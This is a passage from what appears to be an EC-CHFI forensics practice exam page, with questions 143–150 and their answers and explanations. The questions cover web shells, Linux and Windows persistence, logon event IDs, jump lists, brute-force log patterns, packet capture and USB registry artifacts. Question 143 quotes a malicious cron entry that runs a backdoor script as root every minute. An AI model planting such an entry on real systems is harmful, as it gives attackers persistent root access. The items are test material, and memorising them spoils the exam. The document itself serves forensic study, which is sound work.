A web shell is a server-side script that executes commands on the host, and attackers commonly upload it with an executable extension such as .php, .aspx, .jsp, or .cgi into a web-accessible directory. Uncovering an unexpected script file in the web root—especially one with recent creation time or placed in a writable uploads folder—is a direct file-system artifact of a web shell infection. This is the strongest and most specific indicator among the choices, as it represents the actual payload left behind by the attacker.

Why this answer

Option C is correct because web shells are typically deployed as malicious script files (e.g., .aspx, .php, .jsp) placed in web-accessible directories, so finding an unexpected or suspicious script file there is a strong indicator of a web shell. Option D is correct because web shells are commonly invoked through HTTP POST requests to unusual or non-standard script paths, allowing attackers to send commands and receive output over the web channel. Options A, B, and E are not the most likely indicators: DNS queries to external domains, excessive SYN-ACK packets, and high ICMP traffic can reflect other activities such as command-and-control, scanning, or tunneling, but they are not specific artifacts of a web shell on a compromised web server.

Exam trap

In EC-CHFI, the focus is on identifying web shells through application-layer artifacts such as suspicious script files in web directories and unusual HTTP POST requests. Network-level anomalies like DNS queries or SYN floods are not as specific to web shells.

143
MCQhard

During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?

A.Systemd service
B.Init script
C.Cron job
D.At job
AnswerC

Cron jobs are defined in /etc/cron.d, /etc/crontab, or a user's crontab and are executed by the cron daemon according to a schedule specified with time fields (minute, hour, day of month, month, day of week). A file in /etc/cron.d is a standard location for system cron jobs, and the syntax often includes the user account to run the job as well as the command. This matches the scenario where a file found during a Linux forensic investigation is executed on a schedule, making cron the correct classification. The five-field time specification is a unique characteristic that distinguishes cron from systemd services or init scripts.

Why this answer

The entry in /etc/cron.d/evil follows the standard crontab format (minute, hour, day, month, weekday, user, command) and is placed in a system cron directory, making it a cron job. Cron jobs are a common Linux persistence mechanism that execute commands at scheduled intervals, and this one runs /root/backdoor.sh every minute as root.

Exam trap

EC-Council often tests the distinction between cron jobs (recurring, in /etc/cron.d/ or crontab) and at jobs (one-time, in /var/spool/at/), so candidates mistakenly choose 'At job' because both involve scheduled execution, but the repeating asterisk syntax and file location clearly indicate a cron job.

How to eliminate wrong answers

Option A is wrong because systemd services are defined in .service unit files (typically in /etc/systemd/system/) and managed by systemctl, not by entries in /etc/cron.d/. Option B is wrong because init scripts are shell scripts placed in /etc/init.d/ and controlled by the SysV init system (or symlinked via update-rc.d), not by cron directory entries. Option D is wrong because at jobs are scheduled for one-time execution using the 'at' command and stored in /var/spool/at/ or /var/spool/cron/atjobs/, not in /etc/cron.d/ with a repeating crontab syntax.

144
Multi-Selectmedium

Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)

Select 2 answers
A.4720
B.7045
C.4625
D.4648
E.4624
AnswersC, E

4625 is the security event ID for a failed logon attempt, logged when a user presents incorrect credentials or the logon otherwise fails. This event is a core part of Windows authentication auditing, enabling analysts to spot brute-force attacks and lockout thresholds. It is correct for this question because it is one of the two primary logon event IDs, complementing 4624 for successful logon to cover the full authentication picture.

Why this answer

Event ID 4625 [CORRECT] is the Security log entry generated when a logon attempt fails, recording details such as the account name, logon type, and failure reason, so it directly answers the failed-logon half of the question. Event ID 4624 [CORRECT] is the Security log entry generated when a logon attempt succeeds, capturing the new logon's account, logon type, and authentication package, so it answers the successful-logon half. Together these two IDs are the canonical pair for tracking successful and failed interactive, network, and service logons.

The other options do not belong: 4720 is logged when a user account is created, 7045 is a System log entry recording a new service being installed, and 4648 records a logon attempt using explicit credentials (such as RunAs), not a standard success or failure logon event.

Exam trap

The trap here is that candidates often confuse Event ID 4648 (explicit credential usage) with a successful logon, but it only logs when credentials are explicitly supplied for a secondary logon, not the primary authentication event.

145
Multi-Selecteasy

Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)

Select 2 answers
A.Jump lists
B.ShellBags
C.Scheduled Tasks
D.Prefetch files
E.Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
AnswersC, E

Scheduled Tasks are a built-in persistence mechanism managed by the Task Scheduler service (svchost.exe running Schedule) and exposed via schtasks.exe or the XML-based task folders under %SystemRoot%\System32\Tasks. An attacker can create a task with a trigger such as logon, system startup, idle, or a specific event, and specify an action that executes a malicious binary, often with SYSTEM privileges if configured. Unlike jump lists or prefetch files, scheduled tasks are first-class operating system facilities for executing code at defined times, making them a common and persistent malware foothold.

Why this answer

Scheduled Tasks (C) are a well-known Windows persistence mechanism because an attacker can register a task via schtasks.exe or the Task Scheduler that launches malware at logon, on a schedule, or on system events, and these tasks survive reboots. Registry Run keys (E), such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU equivalents, are classic autostart locations that execute listed programs at user logon, making them a common persistence technique. By contrast, Jump lists (A) are artifacts recording recently accessed files and applications for forensic reconstruction, not autostart mechanisms.

ShellBags (B) store folder view settings and window preferences in the registry to show user navigation history, and Prefetch files (D) are performance artifacts in C:\Windows\Prefetch that record executed program traces, neither of which causes programs to run automatically at startup.

Exam trap

EC-Council often tests the distinction between forensic artifacts that record past activity (like Jump lists, ShellBags, and Prefetch) versus those that actively cause code execution on system startup (like Scheduled Tasks and Registry Run keys), leading candidates to confuse evidence of execution with persistence mechanisms.

146
MCQhard

During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?

A.The file is a Chrome extension
B.The user has installed Chrome via a jump list installer
C.The file contains Chrome bookmarks
D.The file stores recent items accessed through Chrome, such as downloaded files
AnswerD

Chrome's jumplist files record recently accessed items surfaced through the taskbar jump list, including downloaded files and recent pages. Their presence evidences user activity tied to Chrome, providing forensic artefacts of accessed content rather than cache or credential data.

Why this answer

Jump lists in Windows store recently accessed items for applications pinned to the taskbar or recently used. The file 'chrome_000001.jumplist' is a Windows-generated binary file that logs recent documents, downloads, or URLs opened via Google Chrome. Its presence indicates the user has recently accessed files or links through Chrome, making D correct.

Exam trap

EC-Council CHFI often tests the misconception that jump lists are browser-specific data files (like bookmarks or extensions) rather than recognizing them as a Windows OS feature for tracking recent application usage, leading candidates to confuse them with Chrome's internal storage formats.

How to eliminate wrong answers

Option A is wrong because Chrome extensions have a '.crx' or '.crx3' extension and are stored in the Extensions subfolder of the Chrome profile, not as a .jumplist file. Option B is wrong because there is no such concept as a 'jump list installer'; jump lists are a Windows shell feature for tracking recent items, unrelated to installation processes. Option C is wrong because Chrome bookmarks are stored in a JSON file named 'Bookmarks' within the user's Chrome profile directory, not in a .jumplist file.

147
MCQeasy

A forensic examiner is analyzing a Windows system and wants to determine the last time a specific user logged on interactively. Which Windows Event Log artifact should the examiner review?

A.Application event log, Event ID 1000 indicating an application error.
B.Security event log, Event ID 4624 with Logon Type 2.
C.Security event log, Event ID 4634 indicating a logoff.
D.System event log, Event ID 6005 indicating the Event Log service started.
AnswerB

Event ID 4624 is logged for successful logons, and Logon Type 2 indicates an interactive logon at the console. This directly answers the question of when a user last logged on interactively. The event includes the date and time, user account, and other details. It is the primary artifact for interactive logon history in Windows Security logs.

Why this answer

Interactive logons are recorded in the Security event log as Event ID 4624 with Logon Type 2. This event includes the timestamp, user account, and other details necessary to determine when the logon occurred. Other event IDs and logs either record different activities or are not related to user logons, making them unsuitable for this purpose.

Exam trap

The trap here is confusing logon events with logoff events or system events, and overlooking that Logon Type 2 specifically denotes an interactive logon at the console.

148
MCQhard

During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by a 'Accepted password for root' entry. What is the MOST likely conclusion?

A.An attacker successfully brute-forced the root password
B.The root user accidentally mistyped the password multiple times
C.The system was compromised via a privilege escalation exploit
D.The root account has been locked out due to multiple failures
AnswerA

Repeated 'Failed password for root' entries from one source, immediately followed by 'Accepted password for root', indicate sustained password guessing that eventually succeeded. The single IP and root-targeted pattern distinguish brute force from a legitimate login or configuration error.

Why this answer

The sequence of multiple 'Failed password for root' entries followed by an 'Accepted password for root' entry from the same IP address is the classic signature of a successful brute-force attack against the root account. SSH authentication logs record each attempt, and a successful login after repeated failures indicates that the attacker guessed or cracked the password, not that a privilege escalation or lockout occurred.

Exam trap

EC-Council CHFI often tests the distinction between authentication log patterns and exploit-based compromise, so the trap here is assuming that any successful login after failures must be a privilege escalation, when the log entries explicitly show password-based authentication succeeded.

How to eliminate wrong answers

Option B is wrong because accidental mistyping by the legitimate root user would not produce a pattern of multiple failures from a single remote IP address; root typically logs in locally or via a console, and repeated typos are unlikely to be followed by a correct entry from the same remote source. Option C is wrong because privilege escalation exploits (e.g., CVE-2021-3156) do not generate 'Failed password' or 'Accepted password' entries in auth.log; they bypass authentication entirely or exploit a vulnerability after login. Option D is wrong because account lockout policies (e.g., pam_tally2 or faillock) would prevent any further login attempts after a threshold of failures, making an 'Accepted password' entry impossible without administrative intervention.

149
MCQmedium

A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?

A.Firewall log review
B.IDS alert correlation
C.Wireshark packet capture with HTTP follow stream
D.NetFlow analysis
AnswerC

Wireshark performs full packet capture at the NIC and saves complete frames, including TCP payloads. Its 'Follow HTTP Stream' feature reassembles individual TCP segments in sequence order and applies HTTP decoding, presenting the entire POST body — e.g., a form field, file content, or encrypted data — in plaintext or raw hex. This is the only option listed that provides direct, forensic-grade evidence of what was transmitted in the exfiltration POST. (Note that capturing must occur on the affected segment; if HTTPS, TLS decryption requires keys.)

Why this answer

Wireshark packet capture with HTTP follow stream allows the investigator to reassemble the full HTTP conversation, including the body of POST requests. By following the TCP stream, the exact payload (e.g., exfiltrated data) is reconstructed in plain text, making it the best technique to identify the data being sent. This method directly captures and decodes the application-layer content, unlike log-based or flow-based analysis.

Exam trap

The trap here is that candidates often choose NetFlow analysis (Option D) because they confuse flow-level metadata with full packet capture, not realizing that NetFlow cannot reconstruct payload content.

How to eliminate wrong answers

Option A is wrong because firewall logs typically record only header-level metadata (source/destination IP, port, protocol, timestamp) and do not capture the HTTP request body or payload content. Option B is wrong because IDS alert correlation focuses on matching network traffic against signatures or anomalies to generate alerts, but it does not provide the raw, reassembled data stream needed to see the actual exfiltrated content. Option D is wrong because NetFlow analysis provides aggregated flow statistics (e.g., bytes transferred, duration, IP pairs) but lacks the packet-level detail required to reconstruct HTTP POST bodies.

150
MCQhard

An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?

A.HKLM\SAM\SAM\Domains\Account\Users
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
AnswerC

HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR is the definitive Windows Plug and Play key for USB storage devices, where each subkey is named with the device instance ID (e.g., Disk&Ven_Kingston&Prod_DataTraveler&Rev_1.00) and a unique serial number. These subkeys persist even after the device is removed, and their LastWriteTime can estimate when the device was last connected, while the FriendlyName and ParentIdPrefix values enrich the picture. Being under the SYSTEM hive, it is machine-wide rather than user-specific, making it the first place investigators query to build a timeline of external storage devices that touched a system.

Why this answer

The USBSTOR key is located under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR and logs each unique USB device by its serial number. This hive is part of the SYSTEM registry, which maintains device enumeration data used by the Plug and Play manager to track connected hardware. Forensic analysts examine this key to identify USB drive insertion history, including first and last connection timestamps.

Exam trap

EC-CHFI often tests the misconception that USB device history is stored in user-specific hives (HKCU) or in the SAM hive, when in fact the SYSTEM hive's Enum\USBSTOR key is the authoritative source for device serial numbers and connection metadata.

How to eliminate wrong answers

Option A is wrong because HKLM\SAM\SAM\Domains\Account\Users stores local user account security identifiers (SIDs) and password hashes, not USB device history. Option B is wrong because HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 records drive letter mappings and volume GUIDs for the current user, but it does not contain the USBSTOR key or device serial numbers. Option D is wrong because HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList stores user profile paths and SIDs, not USB device enumeration data.

← PreviousPage 2 of 3 · 167 questions totalNext →

Ready to test yourself?

Try a timed practice session using only OS and Network Forensics questions.